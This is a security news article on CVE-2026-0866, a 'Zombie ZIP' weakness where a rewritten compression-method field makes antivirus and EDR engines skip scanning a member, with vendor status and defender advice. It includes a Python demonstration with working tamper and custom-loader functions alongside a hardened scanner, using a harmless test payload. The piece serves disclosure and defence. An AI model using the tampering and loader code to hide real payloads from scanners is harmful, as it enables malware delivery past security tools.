Malformed ZIP files can help malware slip past antivirus and EDR scans
A newly disclosed archive-scanning weakness could help attackers hide malware inside specially crafted ZIP files and slip past some antivirus and EDR products. The issue, tracked as CVE-2026-0866, stems from malformed ZIP headers that can stop security tools from properly decompressing and inspecting the archive’s real contents.
CERT/CC says the problem can cause false negatives in antivirus and endpoint detection and response software. In its advisory, the organization warned that malformed ZIP headers can confuse security engines during preprocessing, which means the payload may never get scanned correctly at all.
The weakness sits in the way many scanners handle ZIP metadata. Each ZIP member carries fields such as the compression method, general-purpose flags, and version information, stored once in the local file header and again in the central directory, and CERT/CC says antivirus engines often rely on that metadata to decide how to unpack a member before scanning it. If an attacker overwrites the compression method field with a value the engine does not recognize, the scanner may fail to decompress the member and therefore never inspect the real payload, even though the compressed bytes themselves are untouched.
CERT/CC also says attackers can recover the hidden payload later with a custom loader that ignores the declared Method field and instead decompresses the embedded data directly. That allows the malicious content to stay hidden during the initial security scan while still remaining recoverable for later execution.
This does not mean a tampered ZIP simply opens and runs on its own. CERT/CC notes that many standard extraction tools, including 7-Zip, unzip, bsdtar, and Python’s zipfile, trust the bogus metadata and then fail with CRC or unsupported-method errors. In other words, the archive usually looks broken to normal software, but a tailored loader can still revive the concealed payload.
That combination makes the issue useful for evasion. A malformed archive can look corrupted to everyday tools while also reducing the chance that automated scanners ever inspect the real file hidden inside. CERT/CC says the tactic is similar to an older archive-scanning issue documented as CVE-2004-0935.
The researcher credited for the disclosure is Christopher Aziz. CERT/CC acknowledged Aziz in its advisory, and the public discussion around the issue has referred to the technique as “Zombie ZIP.”
What CERT/CC says happens
| Area | What the advisory says |
|---|---|
| Root issue | Malformed ZIP headers can trigger false negatives in AV and EDR |
| Main trick | Attackers modify ZIP metadata, especially the compression method field |
| Result | Security tools may fail to decompress and inspect the payload |
| Execution path | A custom loader can ignore the fake header and recover the payload |
| Normal tools | Standard extraction tools often fail with CRC or unsupported method errors |
Vendor status so far
CERT/CC’s vendor table does not show a broad set of confirmed patches yet. Cisco is listed as affected, and its statement says ClamAV is unable to scan this type of malformed ZIP file, though Cisco described the issue as a hardening suggestion rather than a conventional product vulnerability. Many other vendors listed by CERT/CC still showed unknown status when the note was published.
That means security teams should not assume their current archive-scanning stack handles this edge case safely. CERT/CC explicitly recommends contacting antivirus and EDR providers to confirm exposure and ask about mitigation guidance.
What defenders should do now
- Ask your antivirus and EDR vendors whether their archive-scanning engine is affected by CVE-2026-0866.
- Treat malformed or corrupted ZIP files as suspicious, especially if they come from email, web downloads, or unknown internal shares. This is an inference based on CERT/CC’s description of how the evasion works.
- Push vendors for stronger validation that compares declared ZIP metadata against the actual file content. CERT/CC says scanners should not rely only on archive metadata.
- Hunt for custom loaders or secondary unpacking routines in suspicious workflows, because CERT/CC says those may be needed to recover the hidden payload.
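The mechanism the advisory describes (a rewritten Method field, standard extractors failing, a loader that ignores the field) and the metadata-independent validation recommended in the list above, as an added Python example that is not code from CERT/CC, the researcher, or any vendor. The payload bytes, the "signature" the toy scanner looks for, and the bogus method value 1337 are constructed for the demonstration; the CERT note does not say which value the technique uses. The parser assumes the plain single-disk, non-ZIP64, no-data-descriptor layout that Python's zipfile writes here, which is enough to show the point.

```python
# Added demonstration, not code from CERT/CC, the researcher, or any vendor.
# Build a ZIP, overwrite its compression-method field, and compare what a
# metadata-trusting extractor, a custom loader, and a hardened scanner each see.
import io
import struct
import zipfile
import zlib

PAYLOAD = b"CONSTRUCTED-TEST-PAYLOAD " * 40   # constructed, compressible stand-in for a payload
SIGNATURE = b"CONSTRUCTED-TEST-PAYLOAD"       # constructed "signature" our toy scanner matches
BOGUS_METHOD = 1337  # assumption: any method id no decoder knows; the CERT note gives no value
LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"


def build_zip(name: str, data: bytes) -> bytes:
    """Well-formed single-member ZIP, method 8 (deflate), built in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def parse_entries(blob: bytes) -> list:
    """Walk the central directory and find each member's raw compressed bytes via
    its local header. Also records where both copies of the Method field live."""
    eocd = blob.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    n_entries, _cd_size, cd_off = struct.unpack_from("<HII", blob, eocd + 10)
    entries, pos = [], cd_off
    for _ in range(n_entries):
        if blob[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("bad central directory header")
        method = struct.unpack_from("<H", blob, pos + 10)[0]
        crc, csize, usize, fnlen, extralen, cmtlen = struct.unpack_from("<IIIHHH", blob, pos + 16)
        lh_off = struct.unpack_from("<I", blob, pos + 42)[0]
        name = blob[pos + 46:pos + 46 + fnlen].decode("utf-8")
        if blob[lh_off:lh_off + 4] != LOCAL_SIG:
            raise ValueError("bad local file header")
        lh_fnlen, lh_extralen = struct.unpack_from("<HH", blob, lh_off + 26)
        data_off = lh_off + 30 + lh_fnlen + lh_extralen   # fixed header + name + extra
        entries.append({"name": name, "method": method, "crc": crc, "usize": usize,
                        "raw": blob[data_off:data_off + csize],
                        "lh_method_off": lh_off + 8, "cd_method_off": pos + 10})
        pos += 46 + fnlen + extralen + cmtlen
    return entries


def tamper_method(blob: bytes, bogus: int = BOGUS_METHOD) -> bytes:
    """The trick from the advisory: leave the compressed data alone and rewrite
    only the Method field (both copies) to a value no extractor supports."""
    out = bytearray(blob)
    for e in parse_entries(blob):
        struct.pack_into("<H", out, e["lh_method_off"], bogus)
        struct.pack_into("<H", out, e["cd_method_off"], bogus)
    return bytes(out)


def standard_extract(blob: bytes, name: str):
    """A metadata-trusting extractor: zipfile picks its decompressor from the
    declared method, so an unknown value ends in NotImplementedError."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return ("ok", zf.read(name))
    except Exception as exc:          # NotImplementedError, BadZipFile, zlib.error
        return ("error", type(exc).__name__)


def _inflate_raw(raw: bytes) -> bytes:
    """ZIP members are raw deflate streams (no zlib header), hence wbits=-15."""
    d = zlib.decompressobj(-15)
    return d.decompress(raw) + d.flush()


def custom_loader(blob: bytes, name: str) -> bytes:
    """Attacker-side recovery: ignore the Method field, inflate the raw bytes directly."""
    for e in parse_entries(blob):
        if e["name"] == name:
            return _inflate_raw(e["raw"])
    raise KeyError(name)


def naive_scan(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """Scanner that trusts the metadata: an extraction error means the payload is
    never inspected, i.e. the false negative the advisory warns about."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return any(signature in zf.read(n) for n in zf.namelist())
    except Exception:
        return False


DECODERS = {0: lambda raw: raw, 8: _inflate_raw}   # stored, deflate


def hardened_scan(blob: bytes, signature: bytes = SIGNATURE) -> list:
    """Scanner that does not trust the Method field: try every decoder it has,
    prefer output consistent with the declared CRC and size, and flag any member
    whose declared metadata disagrees with what actually decodes."""
    verdicts = []
    for e in parse_entries(blob):
        candidates = []
        for method, decode in DECODERS.items():
            try:
                data = decode(e["raw"])
            except zlib.error:
                continue
            crc_ok = zlib.crc32(data) == e["crc"] and len(data) == e["usize"]
            candidates.append((crc_ok, method, data))
        candidates.sort(key=lambda c: not c[0])     # CRC-consistent decode first
        crc_ok, method, data = candidates[0] if candidates else (False, None, b"")
        verdicts.append({"name": e["name"], "declared_method": e["method"], "actual_method": method,
                         "metadata_mismatch": method != e["method"] or not crc_ok,
                         "matched": signature in data})
    return verdicts


if __name__ == "__main__":
    good = build_zip("payload.bin", PAYLOAD)
    bad = tamper_method(good)
    print("zipfile on tampered archive:", standard_extract(bad, "payload.bin"))
    print("custom loader recovers payload:", custom_loader(bad, "payload.bin") == PAYLOAD)
    print("naive scan (trusts metadata):", naive_scan(bad))
    print("hardened scan:", hardened_scan(bad))
```

Running the script prints an `("error", "NotImplementedError")` result for the tampered archive, `True` for the loader, `False` for the naive scan, and a hardened verdict that both finds the signature and sets `metadata_mismatch`. The mismatch flag is the cheap win for defenders: a member whose declared method cannot decode its own bytes is worth quarantining even before any signature matches, because a legitimate archiver has no reason to write one.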
Why this matters
Archive files remain one of the most common ways to move malware through email and downloads. When a malformed ZIP can both confuse security products and frustrate standard extraction tools, it gives attackers a practical evasion method that can blend into everyday file-handling noise. That assessment is an inference, but it follows directly from CERT/CC’s description of false negatives and custom payload recovery.
The bigger issue is trust. Security engines often trust ZIP metadata enough to decide how to inspect a file. CVE-2026-0866 shows that if attackers can corrupt that trust boundary, they may not need a novel malware family to evade detection. They may only need a broken-looking archive and a loader that knows what is really inside.
FAQ
What is CVE-2026-0866?
It is a vulnerability involving malformed ZIP metadata that can cause antivirus and EDR software to miss malicious payloads during archive scanning.
Can normal tools open these archives?
Often, no. CERT/CC says many standard extraction tools fail with CRC or unsupported-method errors when they try to unpack these malformed archives.
How does the hidden payload get recovered?
CERT/CC says a custom loader can ignore the declared compression method and recover the embedded payload directly.
Has any vendor confirmed it is affected?
Yes. CERT/CC lists Cisco as affected, with a statement saying ClamAV cannot properly scan this type of malformed ZIP file. Many other vendors were still listed as unknown in the CERT note.